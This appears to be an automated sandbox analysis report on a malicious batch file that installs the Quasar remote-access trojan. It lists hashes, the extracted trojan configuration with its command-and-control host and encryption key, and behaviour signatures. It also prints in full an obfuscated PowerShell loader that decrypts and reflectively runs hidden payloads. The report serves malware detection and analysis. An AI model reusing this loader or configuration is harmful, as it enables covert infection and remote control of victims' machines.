Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
28-06-2024 23:55
Static task
static1
Behavioral task
behavioral1
Sample
Neo.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Neo.bat
Resource
win10v2004-20240508-en
General
-
Target
Neo.bat
-
Size
272KB
-
MD5
7e4958f049e5dac26748252f3447d3a3
-
SHA1
ee9dcf7b4eb963547edc6adb524e70a20a29aa03
-
SHA256
afd1e3df846e293a28e0cbf7c2d75d14b2741870f4f4d9821a52eb8444ccf182
-
SHA512
b0c40b52ae2543dad9db1b6dd1bd3b13407843715ad0f419d7520b90bb4aed6235187a9baf1bbe7b852c4e39911e65150ef28455a8e52225bc04ab4b8bc39160
-
SSDEEP
6144:l73aNpEWlF7vxuEGAM5sfaHX+Of9iGUfKNjkXtYEgXoTb2k:lLmEWJjMi0X3ViGUf8ctVaY
Malware Config
Extracted
quasar
1.1.0
Slave
runderscore00-42512.portmap.io:42512
QSR_MUTEX_aYgVTolyJfnSo2kPQj
-
encryption_key
Yf65C7zFbniWDCy7fhUm
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/428-36-0x0000000009410000-0x000000000946E000-memory.dmp family_quasar -
Blocklisted process makes network request 29 IoCs
Processes:
powershell.exeflow pid process 2 428 powershell.exe 5 428 powershell.exe 6 428 powershell.exe 7 428 powershell.exe 9 428 powershell.exe 10 428 powershell.exe 11 428 powershell.exe 12 428 powershell.exe 13 428 powershell.exe 14 428 powershell.exe 15 428 powershell.exe 16 428 powershell.exe 17 428 powershell.exe 18 428 powershell.exe 21 428 powershell.exe 23 428 powershell.exe 24 428 powershell.exe 25 428 powershell.exe 26 428 powershell.exe 27 428 powershell.exe 28 428 powershell.exe 29 428 powershell.exe 30 428 powershell.exe 31 428 powershell.exe 32 428 powershell.exe 37 428 powershell.exe 42 428 powershell.exe 43 428 powershell.exe 44 428 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 428 powershell.exe 428 powershell.exe 428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 428 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 428 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 4944 wrote to memory of 428 4944 cmd.exe powershell.exe PID 4944 wrote to memory of 428 4944 cmd.exe powershell.exe PID 4944 wrote to memory of 428 4944 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Neo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/3Efcn+SDEpJR1JenkZ6Rs7BtpqldOJo1ZPEc5aK6j4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('caD4PIX78HWMO7N++ZAzJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hEySi=New-Object System.IO.MemoryStream(,$param_var); $iTdjt=New-Object System.IO.MemoryStream; $eJQAi=New-Object System.IO.Compression.GZipStream($hEySi, [IO.Compression.CompressionMode]::Decompress); $eJQAi.CopyTo($iTdjt); $eJQAi.Dispose(); $hEySi.Dispose(); $iTdjt.Dispose(); $iTdjt.ToArray();}function execute_function($param_var,$param2_var){ $PuVCg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $yPbYO=$PuVCg.EntryPoint; $yPbYO.Invoke($null, $param2_var);}$xkpDo = 'C:\Users\Admin\AppData\Local\Temp\Neo.bat';$host.UI.RawUI.WindowTitle = $xkpDo;$FaHLG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xkpDo).Split([Environment]::NewLine);foreach ($CebJO in $FaHLG) { if ($CebJO.StartsWith(':: ')) { $KEPuw=$CebJO.Substring(3); break; }}$payloads_var=[string[]]$KEPuw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:428
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a